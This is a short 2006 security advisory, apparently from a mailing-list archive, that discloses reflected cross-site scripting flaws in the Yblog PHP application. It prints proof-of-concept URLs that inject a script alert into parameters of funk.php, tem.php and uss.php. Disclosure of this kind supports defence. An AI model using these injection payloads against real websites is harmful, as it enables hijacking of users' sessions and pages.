Yblog => Cross Site Scripting

h4ck3riran Sat, 30 Sep 2006 09:19:30 -0700

#----------------------------------------------------------


#Aria-Security.net Advisory

#Discovered  by: You_You

#< www.Aria-security.net>

#Gr33t to: A.u.r.a  & O.U.T.L.A.W & [EMAIL PROTECTED] @ DrtRp & Cl0wn & S3ll & 
T3rr0r1st

#-----------------------------------------------------------

#Software: Yblog

#Attack method: Cross Site Scripting

#

#

#

#

#Proof of Concept:

#

#Www.Site.coM/[path]/funk.php?id="><script>alert('test!')</script><

#Www.Site.coM/[path]/tem.php?action="><script>alert('test!')</script><

#Www.Site.coM/[path]/uss.php?action="><script>alert('test!')</script>

#

#----------------------------------------------------------                   

#

#Solution

#contact me: [EMAIL PROTECTED]

#

#----------------------------------------------------------  

This program cannot be run in DOS mode

Yblog => Cross Site Scripting

Reply via email to